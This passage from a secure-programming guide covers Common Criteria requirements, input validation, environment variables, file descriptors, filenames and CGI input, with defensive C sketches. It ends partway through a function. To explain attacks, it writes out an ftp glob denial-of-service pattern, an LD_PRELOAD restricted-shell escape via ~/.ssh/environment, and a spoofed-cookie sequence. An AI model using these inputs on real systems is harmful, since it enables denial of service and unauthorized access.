want or don't want these (e.g., should an administrator be able to
determine the real identity of someone hiding behind a pseudonym?). Note
that these can seriously conflict with non-repudiation, if you want those
too. If you're worried about sophisticated threats, these functions can
be hard to provide.
  * Protection of the TOE Security Functions/Self-protection (FPT). Clearly,
if the TOE can be subverted, any security functions it provides aren't
worthwhile, and in many cases a TOE has to provide at least some
self-protection. Perhaps you should "test the underlying abstract
machine" - i.e., test that the underlying components meet your
assumptions, or have the product run self-tests (say during start-up,
periodically, or on request). You should probably "fail secure", at least
under certain conditions; determine what those conditions are. Consider
physical protection of the TOE. You may want some sort of secure recovery
function after a failure. It's often useful to have replay detection
(detect when an attacker is trying to replay older actions) and counter
it. Usually a TOE must make sure that any access checks are always
invoked and actually succeed before performing a restricted action.
  * Resource Utilization (FRU). Perhaps you need to provide fault tolerance,
a priority of service scheme, or support resource allocation (such as a
quota system).
  * TOE Access (FTA). There may be many issues controlling sessions. Perhaps
there should be a limit on the number of concurrent sessions (if you're
running a web service, would it make sense for the same user to be logged
in simultaneously, or from two different machines?). Perhaps you should
lock or terminate a session automatically (e.g., after a timeout), or let
users initiate a session lock. You might want to include a standard
warning banner. One surprisingly useful piece of information is
displaying, on login, information about the last session (e.g., the date/
time and location of the last login) and the date/time of the last
unsuccessful attempt - this gives users information that can help them
detect interlopers. Perhaps sessions can only be established based on
other criteria (e.g., perhaps you can only use the program during
business hours).
  * Trusted path/channels (FTP). A common trick used by attackers is to make
the screen appear to be something it isn't, e.g., run an ordinary program
that looks like a login screen or a forged web site. Thus, perhaps there
needs to be a "trusted path" - a way that users can ensure that they are
talking to the "real" program.
-----------------------------------------------------------------------------
4.4. Security Assurance Measure Requirements
As noted above, the CC has a set of possible assurance requirements that can
be selected, and several predefined sets of assurance requirements (EAL
levels 1 through 7). Again, if you're actually going to go through a CC
evaluation, you should examine the CC documents; I'll skip describing the
measures involving reviewing official CC documents (evaluating PPs and STs).
Here are some assurance measures that can increase the confidence others have
in your software:
  * Configuration management (ACM). At least, have a unique version
identifier for each TOE release, so that users will know what they have.
You gain more assurance if you have good automated tools to control your
software, and have separate version identifiers for each piece (typical
CM tools like CVS can do this, although CVS doesn't record changes as
atomic changes, which is a weakness). The more that's under
configuration management, the better; don't just control your code, but
also control documentation, track all problem reports (especially
security-related ones), and all development tools.
  * Delivery and operation (ADO). Your delivery mechanism should ideally let
users detect unauthorized modifications to prevent someone else
masquerading as the developer, and even better, prevent modification in
the first place. You should provide documentation on how to securely
install, generate, and start-up the TOE, possibly generating a log
describing how the TOE was generated.
  * Development (ADV). These CC requirements deal with documentation
describing the TOE implementation, and require that its pieces be
consistent with each other (e.g., the information in the ST, functional
specification, high-level design, low-level design, and code, as well as
any models of the security policy).
  * Guidance documents (AGD). Users and administrators of your product will
probably need some sort of guidance to help them use it correctly. It
doesn't need to be on paper; on-line help and "wizards" can help too. The
guidance should include warnings about actions that may be a problem in a
secure environment, and describe how to use the system securely.
  * Life-cycle support (ALC). This includes development security (securing
the systems being used for development, including physical security), a
flaw remediation process (to track and correct all security flaws), and
selecting development tools wisely.
  * Tests (ATE). Simply testing can help, but remember that you need to test
the security functions and not just general functions. You should check
that if something is set to be permitted, it is actually permitted, and if
it is forbidden, it is actually refused. Of course, there may be clever
ways to subvert this, which is what vulnerability assessment is all about
(described next).
  * Vulnerability Assessment (AVA). Doing a vulnerability analysis is useful,
where someone pretends to be an attacker and tries to find
vulnerabilities in the product using the available information, including
documentation (look for "don't do X" statements and see if an attacker
could exploit them) and publicly known past vulnerabilities of this or
similar products. This book describes various ways of countering known
vulnerabilities of previous products to problems such as replay attacks
(where known-good information is stored and retransmitted), buffer
overflow attacks, race conditions, and other issues that the rest of this
book describes. The user and administrator guidance documents should be
examined to ensure that misleading, unreasonable, or conflicting guidance
is removed, and that security procedures for all modes of operation have
been addressed. Specialized systems may need to worry about covert
channels; read the CC if you wish to learn more about covert channels.
  * Maintenance of assurance (AMA). If you're not going through a CC
evaluation, you don't need a formal AMA process, but all software
undergoes change. What is your process to give all your users strong
confidence that future changes to your software will not create new
vulnerabilities? For example, you could establish a process where
multiple people review any proposed changes.
-----------------------------------------------------------------------------
Chapter 5. Validate All Input
    Wisdom will save you from the ways of
    wicked men, from men whose words are
    perverse...
                                   --Proverbs 2:12 (NIV)
Some inputs come from untrusted users, so those inputs must be validated
(filtered) before being used. You should determine what is legal and reject
anything that does not match that definition. Do not do the reverse (identify
what is illegal and write code to reject those cases), because you are likely
to forget to handle an important case of illegal input.
There is a good reason for identifying ``illegal'' values, though, and that's
as a set of tests (usually just executed in your head) to be sure that your
validation code is thorough. When I set up an input filter, I mentally attack
the filter to see if there are illegal values that could get through.
Depending on the input, here are a few examples of common ``illegal'' values
that your input filters may need to prevent: the empty string, ".", "..",
"../", anything starting with "/" or ".", anything with "/" or "&" inside it,
any control characters (especially NIL and newline), and/or any characters
with the ``high bit'' set (especially values decimal 254 and 255, and
character 133, the Unicode ``next line'' character used by OS/390). Again,
your code should not be checking for ``bad'' values; you should do this check
mentally to be sure that your pattern ruthlessly limits input values to legal
values. If your pattern isn't sufficiently narrow, you need to carefully
re-examine the pattern to see if there are other problems.
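As a sketch of this whitelist approach, a C validator might look like the
following. The function name and the particular legal pattern (1-64
characters from [A-Za-z0-9_.-], no leading ``.'' or ``-'') are illustrative
assumptions, not a standard:

```c
/* Sketch of a whitelist validator; the name and the legal pattern
 * are illustrative assumptions, not from any standard. */
#include <assert.h>
#include <stddef.h>
#include <string.h>

int is_legal_value(const char *s)
{
    static const char legal[] =
        "abcdefghijklmnopqrstuvwxyz"
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
        "0123456789_.-";
    size_t len;

    if (s == NULL)
        return 0;
    len = strlen(s);
    if (len == 0 || len > 64)        /* reject empty and over-long input */
        return 0;
    if (s[0] == '.' || s[0] == '-')  /* rejects ".", "..", "-rf", ... */
        return 0;
    return strspn(s, legal) == len;  /* every character must be legal */
}
```

Note the mental-attack test described above: ``..'' and ``../x'' fall to the
leading-dot rule, while ``/etc/passwd'' and ``a&b'' fall to the character
whitelist, without the code ever enumerating bad values explicitly.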
Limit the maximum character length (and minimum length if appropriate), and
be sure to not lose control when such lengths are exceeded (see Chapter 6 for
more about buffer overflows).
Here are a few common data types, and things you should validate before using
them from an untrusted user:
  * For strings, identify the legal characters or legal patterns (e.g., as a
regular expression) and reject anything not matching that form. There are
special problems when strings contain control characters (especially
linefeed or NIL) or metacharacters (especially shell metacharacters); it
is often best to ``escape'' such metacharacters immediately when the
input is received so that such characters are not accidentally sent. CERT
goes further and recommends escaping all characters that aren't in a list
of characters not needing escaping [CERT 1998, CMU 1998]. See Section 8.3
for more information on metacharacters. Note that [http://www.w3.org/TR/
2001/NOTE-newline-20010314] line ending encodings vary on different
computers: Unix-based systems use character 0x0a (linefeed), CP/M and DOS
based systems (including Windows) use 0x0d 0x0a (carriage-return
linefeed, and some programs incorrectly reverse the order), the Apple
MacOS uses 0x0d (carriage return), and IBM OS/390 uses 0x85 (decimal 133,
the ``next line'' character, sometimes called newline).
  * Limit all numbers to the minimum (often zero) and maximum allowed values.
  * A full email address checker is actually quite complicated, because there
are legacy formats that greatly complicate validation if you need to
support all of them; see mailaddr(7) and IETF RFC 822 [RFC 822] for more
information if such checking is necessary. Friedl [1997] developed a
regular expression to check if an email address is valid (according to
the specification); his ``short'' regular expression is 4,724 characters,
and his ``optimized'' expression (in appendix B) is 6,598 characters
long. And even that regular expression isn't perfect; it can't recognize
local email addresses, and it can't handle nested parentheses in comments
(as the specification permits). Often you can simplify and only permit
the ``common'' Internet address formats.
  * Filenames should be checked; see Section 5.4 for more information on
filenames.
  * URIs (including URLs) should be checked for validity. If you are directly
acting on a URI (i.e., you're implementing a web server or
web-server-like program and the URL is a request for your data), make
sure the URI is valid, and be especially careful of URIs that try to
``escape'' the document root (the area of the filesystem that the server
is responding to). The most common ways to escape the document root are
via ``..'' or a symbolic link, so most servers check any ``..''
directories themselves and ignore symbolic links unless specially
directed. Also remember to decode any encoding first (via URL encoding or
UTF-8 encoding), or an encoded ``..'' could slip through. URIs aren't
supposed to even include UTF-8 encoding, so the safest thing is to reject
any URIs that include characters with high bits set.
If you are implementing a system that uses the URI/URL as data, you're
not home-free at all; you need to ensure that malicious users can't
insert URIs that will harm other users. See Section 5.11.4 for more
information about this.
  * When accepting cookie values, make sure to check that the domain value for
any cookie you're using is the expected one. Otherwise, a (possibly
cracked) related site might be able to insert spoofed cookies. Here's an
example from IETF RFC 2965 of how failing to do this check could cause a
problem:
    + User agent makes request to victim.cracker.edu, gets back cookie
session_id="1234" and sets the default domain victim.cracker.edu.
    + User agent makes request to spoof.cracker.edu, gets back cookie
session-id="1111", with Domain=".cracker.edu".
    + User agent makes request to victim.cracker.edu again, and passes:
Cookie: $Version="1"; session_id="1234",
$Version="1"; session_id="1111"; $Domain=".cracker.edu"
The server at victim.cracker.edu should detect that the second cookie
was not one it originated by noticing that the Domain attribute is
not for itself and ignore it.
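Since line-ending encodings vary (as the string item above notes), input
read line by line is often easiest to handle by stripping the terminator
up front. The helper below is a sketch (the function name is mine); it
accepts LF, CR LF, bare CR, and the 0x85 NEL byte:

```c
#include <assert.h>
#include <string.h>

/* Strip one trailing line terminator in place; returns 1 if one was
 * removed. Accepts "\n", "\r\n", "\r", and 0x85 (NEL, used by OS/390). */
int chomp_line(char *s)
{
    size_t len = strlen(s);

    if (len == 0)
        return 0;
    if (s[len - 1] == '\n') {
        s[--len] = '\0';
        if (len > 0 && s[len - 1] == '\r')   /* CR LF pair */
            s[--len] = '\0';
        return 1;
    }
    if (s[len - 1] == '\r' || (unsigned char)s[len - 1] == 0x85) {
        s[len - 1] = '\0';
        return 1;
    }
    return 0;
}
```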
Unless you account for them, the legal character patterns must not include
characters or character sequences that have special meaning to either the
program internals or the eventual output:
  * A character sequence may have special meaning to the program's internal
storage format. For example, if you store data (internally or externally)
in delimited strings, make sure that the delimiters are not permitted
data values. A number of programs store data in comma (,) or colon (:)
delimited text files; inserting the delimiters in the input can be a
problem unless the program accounts for it (i.e., by preventing it or
encoding it in some way). Other characters often causing these problems
include single and double quotes (used for surrounding strings) and the
less-than sign "<" (used in SGML, XML, and HTML to indicate a tag's
beginning; this is important if you store data in these formats). Most
data formats have an escape sequence to handle these cases; use it, or
filter such data on input.
  * A character sequence may have special meaning if sent back out to a user.
A common example of this is permitting HTML tags in data input that will
later be posted to other readers (e.g., in a guestbook or ``reader
comment'' area). However, the problem is much more general. See Section
7.15 for a general discussion on the topic, and see Section 5.11 for a
specific discussion about filtering HTML.
These tests should usually be centralized in one place so that the validity
tests can be easily examined for correctness later.
Make sure that your validity test is actually correct; this is particularly a
problem when checking input that will be used by another program (such as a
filename, email address, or URL). Often these tests have subtle errors,
producing the so-called ``deputy problem'' (where the checking program makes
different assumptions than the program that actually uses the data). If
there's a relevant standard, look at it, but also search to see if the
program has extensions that you need to know about.
While parsing user input, it's a good idea to temporarily drop all
privileges, or even create separate processes (with the parser having
permanently dropped privileges, and the other process performing security
checks against the parser requests). This is especially true if the parsing
task is complex (e.g., if you use a lex-like or yacc-like tool), or if the
programming language doesn't protect against buffer overflows (e.g., C and
C++). See Section 7.4 for more information on minimizing privileges.
When using data for security decisions (e.g., ``let this user in''), be sure
to use trustworthy channels. For example, on a public Internet, don't just
use the machine IP address or port number as the sole way to authenticate
users, because in most environments this information can be set by the
(potentially malicious) user. See Section 7.11 for more information.
The following subsections discuss different kinds of inputs to a program;
note that input includes process state such as environment variables, umask
values, and so on. Not all inputs are under the control of an untrusted user,
so you need only worry about those inputs that are.
-----------------------------------------------------------------------------
5.1. Command line
Many programs take input from the command line. A setuid/setgid program's
command line data is provided by an untrusted user, so a setuid/setgid
program must defend itself from potentially hostile command line values.
Attackers can send just about any kind of data through a command line
(through calls such as the execve(3) call). Therefore, setuid/setgid programs
must completely validate the command line inputs and must not trust the name
of the program reported by command line argument zero (an attacker can set it
to any value including NULL).
-----------------------------------------------------------------------------
5.2. Environment Variables
By default, environment variables are inherited from a process' parent.
However, when a program executes another program, the calling program can set
the environment variables to arbitrary values. This is dangerous to setuid/
setgid programs, because their invoker can completely control the environment
variables they're given. Since they are usually inherited, this also applies
transitively; a secure program might call some other program and, without
special measures, would pass potentially dangerous environment variables
values on to the program it calls. The following subsections discuss
environment variables and what to do with them.
-----------------------------------------------------------------------------
5.2.1. Some Environment Variables are Dangerous
Some environment variables are dangerous because many libraries and programs
are controlled by environment variables in ways that are obscure, subtle, or
undocumented. For example, the IFS variable is used by the sh and bash shell
to determine which characters separate command line arguments. Since the
shell is invoked by several low-level calls (like system(3) and popen(3) in
C, or the back-tick operator in Perl), setting IFS to unusual values can
subvert apparently-safe calls. This behavior is documented in bash and sh,
but it's obscure; many long-time users only know about IFS because of its use
in breaking security, not because it's actually used very often for its
intended purpose. What is worse is that not all environment variables are
documented, and even if they are, those other programs may change and add
dangerous environment variables. Thus, the only real solution (described
below) is to select the ones you need and throw away the rest.
-----------------------------------------------------------------------------
5.2.2. Environment Variable Storage Format is Dangerous
Normally, programs should use the standard access routines to access
environment variables. For example, in C, you should get values using getenv
(3), set them using the POSIX standard routine putenv(3) or the BSD extension
setenv(3) and eliminate environment variables using unsetenv(3). I should
note here that setenv(3) is implemented in Linux, too.
However, crackers need not be so nice; crackers can directly control the
environment variable data area passed to a program using execve(2). This
permits some nasty attacks, which can only be understood by understanding how
environment variables really work. In Linux, you can see environ(5) for a
summary of how environment variables really work. In short, environment
variables are internally stored as a pointer to an array of pointers to
characters; this array is stored in order and terminated by a NULL pointer
(so you'll know when the array ends). The pointers to characters, in turn,
each point to a NIL-terminated string value of the form ``NAME=value''. This
has several implications, for example, environment variable names can't
include the equal sign, and neither the name nor value can have embedded NIL
characters. However, a more dangerous implication of this format is that it
allows multiple entries with the same variable name, but with different
values (e.g., more than one value for SHELL). While typical command shells
prohibit doing this, a locally-executing cracker can create such a situation
using execve(2).
The problem with this storage format (and the way it's set) is that a program
might check one of these values (to see if it's valid) but actually use a
different one. In Linux, the GNU glibc libraries try to shield programs from
this; glibc 2.1's implementation of getenv will always get the first matching
entry, setenv and putenv will always set the first matching entry, and
unsetenv will actually unset all of the matching entries (congratulations to
the GNU glibc implementers for implementing unsetenv this way!). However,
some programs go directly to the environ variable and iterate across all
environment variables; in this case, they might use the last matching entry
instead of the first one. As a result, if checks were made against the first
matching entry instead, but the actual value used is the last matching entry,
a cracker can use this fact to circumvent the protection routines.
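To make the duplicate-entry attack concrete, here is a small sketch (the
function name is mine) that walks environ directly and counts how many
entries carry a given name; a defensive setuid program could treat any
count above one as evidence of tampering:

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

extern char **environ;

/* Count entries in environ whose name is exactly 'name'. */
int count_env_entries(const char *name)
{
    size_t namelen = strlen(name);
    int count = 0;
    char **ep;

    for (ep = environ; ep != NULL && *ep != NULL; ep++) {
        /* An entry matches only if it begins with "NAME=". */
        if (strncmp(*ep, name, namelen) == 0 && (*ep)[namelen] == '=')
            count++;
    }
    return count;
}
```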
-----------------------------------------------------------------------------
5.2.3. The Solution - Extract and Erase
For secure setuid/setgid programs, the short list of environment variables
needed as input (if any) should be carefully extracted. Then the entire
environment should be erased, followed by resetting a small set of necessary
environment variables to safe values. There really isn't a better way if you
make any calls to subordinate programs; there's no practical method of
listing ``all the dangerous values''. Even if you reviewed the source code of
every program you call directly or indirectly, someone may add new
undocumented environment variables after you write your code, and one of them
may be exploitable.
The simple way to erase the environment in C/C++ is by setting the global
variable environ to NULL. The global variable environ is defined in
<unistd.h>; C/C++ users will want to #include this header file. You will need to
manipulate this value before spawning threads, but that's rarely a problem,
since you want to do these manipulations very early in the program's
execution (usually before threads are spawned).
The global variable environ is defined in various standards;
it's not clear that the official standards condone directly changing its
value, but I'm unaware of any Unix-like system that has trouble with doing
this. I normally just modify the ``environ'' directly; manipulating such
low-level components is possibly non-portable, but it assures you that you
get a clean (and safe) environment. In the rare case where you need later
access to the entire set of variables, you could save the ``environ''
variable's value somewhere, but this is rarely necessary; nearly all programs
need only a few values, and the rest can be dropped.
Another way to clear the environment is to use the undocumented clearenv()
function. The function clearenv() has an odd history; it was supposed to be
defined in POSIX.1, but somehow never made it into that standard. However,
clearenv() is defined in POSIX.9 (the Fortran 77 bindings to POSIX), so there
is a quasi-official status for it. In Linux, clearenv() is defined in
<stdlib.h>, but before using #include to include it you must make sure that
__USE_MISC is #defined. A somewhat more ``official'' approach is to cause
__USE_MISC to be defined is to first #define either _SVID_SOURCE or
_BSD_SOURCE, and then #include <features.h> - these are the official feature
test macros.
One environment value you'll almost certainly re-add is PATH, the list of
directories to search for programs; PATH should not include the current
directory and usually be something simple like ``/bin:/usr/bin''. Typically
you'll also set IFS (to its default of `` \t\n'', where space is the first
character) and TZ (timezone). Linux won't die if you don't supply either IFS
or TZ, but some System V based systems have problems if you don't supply a TZ
value, and it's rumored that some shells need the IFS value set. In Linux,
see environ(5) for a list of common environment variables that you might want
to set.
If you really need user-supplied values, check the values first (to ensure
that the values match a pattern for legal values and that they are within
some reasonable maximum length). Ideally there would be some standard trusted
file in /etc with the information for ``standard safe environment variable
values'', but at this time there's no standard file defined for this purpose.
For something similar, you might want to examine the PAM module pam_env on
those systems which have that module. If you allow users to set an arbitrary
environment variable, then you'll let them subvert restricted shells (more on
that below).
If you're using a shell as your programming language, you can use the
``/usr/bin/env'' program with the ``-'' option (which erases all environment
variables of the program being run). Basically, you call /usr/bin/env, give
it the ``-'' option, follow that with the set of variables and their values
you wish to set (as name=value), and then follow that with the name of the
program to run and its arguments. You usually want to call the program using
the full pathname (/usr/bin/env) and not just as ``env'', in case a user has
created a dangerous PATH value. Note that GNU's env also accepts the options
"-i" and "--ignore-environment" as synonyms (they also erase the environment
of the program being started), but these aren't portable to other versions of
env.
If you're programming a setuid/setgid program in a language that doesn't
allow you to reset the environment directly, one approach is to create a
``wrapper'' program. The wrapper sets the environment variables to safe values,
and then calls the other program. Beware: make sure the wrapper will actually
invoke the intended program; if it's an interpreted program, make sure
there's no race condition possible that would allow the interpreter to load a
different program than the one that was granted the special setuid/setgid
privileges.
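One way to build such a wrapper in C is to bypass the inherited environment
entirely and pass an explicit envp to execve(2). The sketch below (the
function name and the safe-variable list are my assumptions) forks, execs
the target with a clean environment, and returns the child's exit status:

```c
#include <assert.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Run 'path' with an explicit, minimal environment; returns the child's
 * exit status, 127 if the exec failed, or -1 on fork/wait error. */
int run_with_clean_env(const char *path, char *argv0)
{
    char *const safe_env[] = { "PATH=/bin:/usr/bin", "IFS= \t\n", NULL };
    pid_t pid = fork();
    int status;

    if (pid < 0)
        return -1;
    if (pid == 0) {                    /* child: exec with the clean envp */
        char *const args[] = { argv0, NULL };
        execve(path, args, safe_env);
        _exit(127);                    /* only reached if the exec failed */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

Note that a fixed full path is used; the wrapper must never trust PATH or
argv[0], and for interpreted targets the race-condition caveat above still
applies.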
-----------------------------------------------------------------------------
5.2.4. Don't Let Users Set Their Own Environment Variables
If you allow users to set their own environment variables, then users will be
able to escape out of restricted accounts (these are accounts that are
supposed to only let the users run certain programs and not work as a
general-purpose machine). This includes letting users write or modify certain
files in their home directory (e.g., .login), supporting conventions
that load in environment variables from files under the user's control (e.g.,
openssh's .ssh/environment file), or supporting protocols that transfer
environment variables (e.g., the Telnet Environment Option; see CERT Advisory
CA-1995-14 for more). Restricted accounts should never be allowed to modify
or add any file directly contained in their home directory, and instead
should be given only a specific subdirectory that they are allowed to modify
(if they can modify any).
ari posted a detailed discussion of this problem on Bugtraq on June 24, 2002:
Given the similarities with certain other security issues, i'm surprised
this hasn't been discussed earlier. If it has, people simply haven't paid
it enough attention.
This problem is not necessarily ssh-specific, though most telnet daemons
that support environment passing should already be configured to remove
dangerous variables due to a similar (and more serious) issue back in '95
(ref: [1]). I will give ssh-based examples here.
Scenario one: Let's say admin bob has a host that he wants to give people
ftp access to. Bob doesn't want anyone to have the ability to actually
_log into_ his system, so instead of giving users normal shells, or even
no shells, bob gives them all (say) /usr/sbin/nologin, a program he wrote
himself in C to essentially log the attempt to syslog and exit,
effectively ending the user's session. As far as most people are
concerned, the user can't do much with this aside from, say, setting up
an encrypted tunnel.
The thing is, bob's system uses dynamic libraries (as most do), and /usr/
sbin/nologin is dynamically linked (as most such programs are). If a user
can set his environment variables (e.g. by uploading a '.ssh/environment'
file) and put some arbitrary file on the system (e.g. 'doevilstuff.so'),
he can bypass any functionality of /usr/sbin/nologin completely via
LD_PRELOAD (or another member of the LD_* environment family).
The user can now gain a shell on the system (with his own privileges, of
course, barring any 'UseLogin' issues (ref: [2])), and administrator bob,
if he were aware of what just occurred, would be extremely unhappy.
Granted, there are all kinds of interesting ways to (more or less) do
away with this problem. Bob could just grit his teeth and give the ftp
users a nonexistent shell, or he could statically compile nologin,
assuming his operating system comes with static libraries. Bob could
also, humorously, make his nologin program setuid and let the standard C
library take care of the situation. Then, of course, there are also the
ssh-specific access controls such as AllowGroup and AllowUsers. These may
appease the situation in this scenario, but it does not correct the
problem.
... Now, what happens if bob, instead of using /usr/sbin/nologin, wants
to use (for example) some BBS-type interface that he wrote up or
downloaded? It can be a script written in perl or tcl or python, or it
could be a compiled program; doesn't matter. Additionally, bob need not
be running an ftp server on this host; instead, perhaps bob uses nfs or
veritas to mount user home directories from a fileserver on his network;
this exact setup is (unfortunately) employed by many bastion hosts,
password management hosts and mail servers---to name a few. Perhaps bob
runs an ISP, and replaces the user's shell when he doesn't pay. With all
of these possible (and common) scenarios, bob's going to have a somewhat
more difficult time getting around the problem.
... Exploitation of the problem is simple. The circumvention code would
be compiled into a dynamic library and LD_PRELOAD=/path/to/evil.so should
be placed into ~user/.ssh/environment (a similar environment option may
be appended to public keys in the authorized_keys file). If no
dynamically loadable programs are executed, this will have no effect.
ISPs and universities (along with similarly affected organizations)
should compile their rejection (or otherwise restricted) binaries
statically (assuming your operating system comes with static
libraries)...
Ideally, sshd (and all remote access programs that allow user-definable
environments) should strip any environment settings that libc ignores for
setuid programs.
-----------------------------------------------------------------------------
5.3. File Descriptors
A program is passed a set of ``open file descriptors'', that is, pre-opened
files. A setuid/setgid program must deal with the fact that the user gets to
select what files are open and to what (within their permission limits). A
setuid/setgid program must not assume that opening a new file will always
open into a fixed file descriptor id, or that the open will succeed at all.
It must also not assume that standard input (stdin), standard output
(stdout), and standard error (stderr) refer to a terminal or are even open.
The rationale behind this is easy; since an attacker can open or close a file
descriptor before starting the program, the attacker could create an
unexpected situation. If the attacker closes the standard output, when the
program opens the next file it will be opened as though it were standard
output, and then it will send all standard output to that file as well. Some
C libraries will automatically open stdin, stdout, and stderr to /dev/null if
they aren't already open, but this isn't true on all Unix-like systems.
Also, these libraries can't be completely depended on; for example, on some
systems it's possible to create a race condition that causes this automatic
opening to fail (and still run the program).
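A common defensive idiom, shown here as a sketch (the function name is mine), is to make sure descriptors 0, 1, and 2 are open before doing anything else, binding any that were closed to /dev/null:

```c
#include <assert.h>
#include <fcntl.h>
#include <unistd.h>

/* Sketch: guarantee that fds 0, 1 and 2 are open before any other
 * file is opened, so a later open() cannot silently land on what the
 * program believes is standard input/output/error. */
static void ensure_std_fds(void)
{
    int fd;
    while ((fd = open("/dev/null", O_RDWR)) != -1) {
        if (fd > 2) {           /* 0, 1 and 2 are all open now */
            close(fd);
            return;
        }
        /* fd was 0, 1 or 2: it had been closed by our caller; leave
         * it attached to /dev/null and keep checking. */
    }
    _exit(1);                   /* cannot even open /dev/null */
}
```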
-----------------------------------------------------------------------------
5.4. File Names
The names of files can, in certain circumstances, cause serious problems.
This is especially a problem for secure programs that run on computers with
local untrusted users, but this isn't limited to that circumstance. Remote
users may be able to trick a program into creating undesirable filenames
(programs should prevent this, but not all do), or remote users may have
partially penetrated a system and try using this trick to penetrate the rest
of the system.
Usually you should not accept ``..'' (a reference to the parent directory) as
a legal value from an untrusted user, though that depends on the
circumstances. You might also want to list only the characters you will
permit, and forbid any filenames that don't match the list. If you're taking
data from an external user and transforming it into a filename, it's best to
prohibit any change of directory, e.g., by not including ``/'' in the set of
legal characters.
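As a sketch of the whitelist approach (the function name and the exact alphabet are illustrative; tighten or loosen the set for your application):

```c
#include <assert.h>
#include <string.h>

/* Sketch: accept only filenames built from an explicit safe alphabet.
 * Rejecting a leading '.' or '-' also rules out ``..'', hidden files
 * and option-like names; '/' is simply absent from the alphabet. */
static int filename_ok(const char *name)
{
    static const char safe[] =
        "abcdefghijklmnopqrstuvwxyz"
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
        "0123456789._-";
    if (name[0] == '\0' || name[0] == '-' || name[0] == '.')
        return 0;
    return strspn(name, safe) == strlen(name);
}
```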
Often you shouldn't support ``globbing'', that is, expanding filenames using
``*'', ``?'', ``['' (matching ``]''), and possibly ``{'' (matching ``}'').
For example, the command ``ls *.png'' does a glob on ``*.png'' to list all
PNG files. The C fopen(3) command (for example) doesn't do globbing, but the
command shells perform globbing by default, and in C you can request globbing
using (for example) glob(3). If you don't need globbing, just use the calls
that don't do it where possible (e.g., fopen(3)) and/or disable them (e.g.,
escape the globbing characters in a shell). Be especially careful if you want
to permit globbing. Globbing can be useful, but complex globs can take a
great deal of computing time. For example, on some ftp servers, performing a
few of these requests can easily cause a denial-of-service of the entire
machine:
ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
Trying to allow globbing, yet limit globbing patterns, is probably futile.
Instead, make sure that any such programs run as a separate process and use
process limits to limit the amount of CPU and other resources they can
consume. See Section 7.4.8 for more information on this approach, and see
Section 3.6 for more information on how to set these limits.
Unix-like systems generally forbid including the NIL character in a filename
(since this marks the end of the name) and the '/' character (since this is
the directory separator). However, they often permit anything else, which is
a problem; it is easy to write programs that can be subverted by
cleverly-created filenames.
Filenames that can especially cause problems include:
  * Filenames with leading dashes (-). If passed to other programs, this may
    cause the other programs to misinterpret the name as option settings.
    Ideally, Unix-like systems shouldn't allow these filenames; they aren't
    needed and create many unnecessary security problems. Unfortunately,
    currently developers have to deal with them. Thus, whenever calling
    another program with a filename, insert ``--'' before the filename
    parameters (to stop option processing, if the program supports this
    common request) or modify the filename (e.g., insert ``./'' in front of
    the filename to keep the dash from being the lead character).
  * Filenames with control characters. This especially includes newlines and
    carriage returns (which are often confused as argument separators inside
    shell scripts, or can split log entries into multiple entries) and the
    ESCAPE character (which can interfere with terminal emulators, causing
    them to perform undesired actions outside the user's control). Ideally,
    Unix-like systems shouldn't allow these filenames either; they aren't
    needed and create many unnecessary security problems.
  * Filenames with spaces; these can sometimes confuse a shell into treating
    the name as multiple arguments, with the other arguments causing
    problems. Since other operating systems allow spaces in filenames
    (including Windows and MacOS), for interoperability's sake this will
    probably always be permitted. Please be careful in dealing with them,
    e.g., in the shell use double-quotes around all filename parameters
    whenever calling another program. You might want to forbid leading and
    trailing spaces at least; these aren't as visible as when they occur in
    other places, and can confuse human users.
  * Invalid character encoding. For example, a program may believe that the
    filename is UTF-8 encoded, but it may have an invalidly long UTF-8
    encoding. See Section 5.9.2 for more information. I'd like to see
    agreement on the character encoding used for filenames (e.g., UTF-8),
    and then have the operating system enforce the encoding (so that only
    legal encodings are allowed), but that hasn't happened at this time.
  * Any other character special to internal data formats, such as ``<'',
    ``;'', quote characters, backslash, and so on.
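When a questionable name must be passed on anyway, the ``./'' trick from the first bullet can be wrapped up as a small helper (a sketch; the function name is mine):

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Sketch: neutralize a leading dash by prefixing ``./'' before the
 * name is handed to another program, so it cannot be mistaken for an
 * option.  Returns the (possibly rewritten) name, or the original
 * name unchanged if no rewrite was needed or the buffer is too
 * small (so callers should still pass ``--'' where supported). */
static const char *undash(const char *name, char *buf, size_t buflen)
{
    if (name[0] == '-' && strlen(name) + 3 <= buflen) {
        snprintf(buf, buflen, "./%s", name);
        return buf;
    }
    return name;
}
```

Passing ``--'' before filename arguments remains good practice even with this rewrite.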
-----------------------------------------------------------------------------
5.5. File Contents
If a program takes directions from a file, it must not trust that file
specially unless only a trusted user can control its contents. Usually this
means that an untrusted user must not be able to modify the file, its
directory, or any of its ancestor directories. Otherwise, the file must be
treated as suspect.
If the directions in the file are supposed to be from an untrusted user, then
make sure that the inputs from the file are protected as described throughout
this book. In particular, check that values match the set of legal values,
and that buffers are not overflowed.
-----------------------------------------------------------------------------
5.6. Web-Based Application Inputs (Especially CGI Scripts)
Web-based applications (such as CGI scripts) run on some trusted server and
must get their input data somehow through the web. Since the input data
generally come from untrusted users, this input data must be validated.
Indeed, this information may have actually come from an untrusted third
party; see Section 7.15 for more information. For example, CGI scripts are
passed this information through a standard set of environment variables and
through standard input. The rest of this text will specifically discuss CGI,
because it's the most common technique for implementing dynamic web content,
but the general issues are the same for most other dynamic web content
techniques.
One additional complication is that many CGI inputs are provided in so-called
``URL-encoded'' format, that is, some values are written in the format %HH
where HH is the hexadecimal code for that byte. You or your CGI library must
handle these inputs correctly by URL-decoding the input and then checking if
the resulting byte value is acceptable. You must correctly handle all values,
including problematic values such as %00 (NIL) and %0A (newline). Don't
decode inputs more than once, or input such as ``%2500'' will be mishandled
(the %25 would be translated to ``%'', and the resulting ``%00'' would be
erroneously translated to the NIL character).
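The decode-exactly-once rule can be sketched as follows (the function name is mine; a real CGI library should already provide this):

```c
#include <assert.h>
#include <ctype.h>
#include <stdlib.h>
#include <string.h>

/* Sketch: decode %HH escapes exactly once, rejecting malformed
 * escapes and an encoded NIL (%00).  Returns 0 on success, -1 on
 * bad input or a too-small output buffer. */
static int url_decode_once(const char *in, char *out, size_t outlen)
{
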